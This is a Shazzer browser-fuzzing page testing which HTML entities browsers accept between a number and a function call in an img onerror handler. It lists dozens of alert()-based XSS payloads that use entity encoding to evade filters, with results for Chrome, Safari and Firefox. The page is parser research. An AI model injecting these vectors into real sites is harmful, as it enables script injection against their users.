Shazzer logo

    Entities allowed between function call and number

    This vector uses Shazzer's new features to check which entities are allowed between a function call and number using images. The results are a bit inconsistent yet because I currently wait for page load.

    Created by: hackvertor

    Created on: 7/2/2024, 11:29:20 AM

    Updated on: 7/4/2024, 1:20:10 AM

    Vector type: XSS

    Template used:
    <img src=data: onerror="1$[data1]log('html($[data1])')">
    Your browser was detected as:
    Detecting... Detecting... Detecting... Detecting...

    Sample payloads

    <img src=data: onerror="1&VerticalLine;alert('&#38;VerticalLine;')">
    <img src=data: onerror="1&semi;alert('&#38;semi;')">
    <img src=data: onerror="1&midast;alert('&#38;midast;')">
    <img src=data: onerror="1&amp;alert('&#38;amp;')">
    <img src=data: onerror="1&NewLine;alert('&#38;NewLine;')">
    <img src=data: onerror="1&plus;alert('&#38;plus;')">
    <img src=data: onerror="1&LT;alert('&#38;LT;')">
    <img src=data: onerror="1&sol;alert('&#38;sol;')">
    <img src=data: onerror="1&ast;alert('&#38;ast;')">
    <img src=data: onerror="1&Hat;alert('&#38;Hat;')">
    <img src=data: onerror="1&lt;alert('&#38;lt;')">
    <img src=data: onerror="1&verbar;alert('&#38;verbar;')">
    <img src=data: onerror="1&comma;alert('&#38;comma;')">
    <img src=data: onerror="1&gt;alert('&#38;gt;')">
    <img src=data: onerror="1&vert;alert('&#38;vert;')">
    <img src=data: onerror="1&GT;alert('&#38;GT;')">
    <img src=data: onerror="1&AMP;alert('&#38;AMP;')">
    <img src=data: onerror="1&percnt;alert('&#38;percnt;')">
    <img src=data: onerror="1&vert;alert('&#38;vert;')">
    <img src=data: onerror="1&NewLine;alert('&#38;NewLine;')">
    <img src=data: onerror="1&ast;alert('&#38;ast;')">
    <img src=data: onerror="1&LT;alert('&#38;LT;')">
    <img src=data: onerror="1&semi;alert('&#38;semi;')">
    <img src=data: onerror="1&Hat;alert('&#38;Hat;')">
    <img src=data: onerror="1&AMP;alert('&#38;AMP;')">
    <img src=data: onerror="1&percnt;alert('&#38;percnt;')">
    <img src=data: onerror="1&comma;alert('&#38;comma;')">
    <img src=data: onerror="1&verbar;alert('&#38;verbar;')">
    <img src=data: onerror="1&GT;alert('&#38;GT;')">
    <img src=data: onerror="1&plus;alert('&#38;plus;')">
    <img src=data: onerror="1&VerticalLine;alert('&#38;VerticalLine;')">
    <img src=data: onerror="1&sol;alert('&#38;sol;')">
    <img src=data: onerror="1&gt;alert('&#38;gt;')">
    <img src=data: onerror="1&midast;alert('&#38;midast;')">
    <img src=data: onerror="1&amp;alert('&#38;amp;')">
    <img src=data: onerror="1&lt;alert('&#38;lt;')">
    <img src=data: onerror="1&amp;alert('&#38;amp;')">
    <img src=data: onerror="1&AMP;alert('&#38;AMP;')">
    <img src=data: onerror="1&ast;alert('&#38;ast;')">
    <img src=data: onerror="1&comma;alert('&#38;comma;')">
    <img src=data: onerror="1&gt;alert('&#38;gt;')">
    <img src=data: onerror="1&GT;alert('&#38;GT;')">
    <img src=data: onerror="1&Hat;alert('&#38;Hat;')">
    <img src=data: onerror="1&lt;alert('&#38;lt;')">
    <img src=data: onerror="1&LT;alert('&#38;LT;')">
    <img src=data: onerror="1&midast;alert('&#38;midast;')">
    <img src=data: onerror="1&NewLine;alert('&#38;NewLine;')">
    <img src=data: onerror="1&percnt;alert('&#38;percnt;')">
    <img src=data: onerror="1&plus;alert('&#38;plus;')">
    <img src=data: onerror="1&semi;alert('&#38;semi;')">
    <img src=data: onerror="1&sol;alert('&#38;sol;')">
    <img src=data: onerror="1&verbar;alert('&#38;verbar;')">
    <img src=data: onerror="1&vert;alert('&#38;vert;')">
    <img src=data: onerror="1&VerticalLine;alert('&#38;VerticalLine;')">

    Fuzz results

    Chrome logo
    Chrome 126.0.0.0 desktop macOS 10.15.7
    Found 18 results
    Data
    &amp;
    Data
    &AMP;
    Data
    &ast;
    Data
    &comma;
    Data
    &gt;
    Data
    &GT;
    Data
    &Hat;
    Data
    &lt;
    Data
    &LT;
    Data
    &midast;
    Data
    &NewLine;
    Data
    &percnt;
    Data
    &plus;
    Data
    &semi;
    Data
    &sol;
    Data
    &verbar;
    Data
    &vert;
    Data
    &VerticalLine;
    Safari logo
    Safari 18.0 desktop macOS 10.15.7
    Found 18 results
    Data
    &amp;
    Data
    &AMP;
    Data
    &ast;
    Data
    &comma;
    Data
    &gt;
    Data
    &GT;
    Data
    &Hat;
    Data
    &lt;
    Data
    &LT;
    Data
    &midast;
    Data
    &NewLine;
    Data
    &percnt;
    Data
    &plus;
    Data
    &semi;
    Data
    &sol;
    Data
    &verbar;
    Data
    &vert;
    Data
    &VerticalLine;
    Firefox logo
    Firefox 127.0 desktop macOS 10.15
    Found 18 results
    Data
    &amp;
    Data
    &AMP;
    Data
    &ast;
    Data
    &comma;
    Data
    &gt;
    Data
    &GT;
    Data
    &Hat;
    Data
    &lt;
    Data
    &LT;
    Data
    &midast;
    Data
    &NewLine;
    Data
    &percnt;
    Data
    &plus;
    Data
    &semi;
    Data
    &sol;
    Data
    &verbar;
    Data
    &vert;
    Data
    &VerticalLine;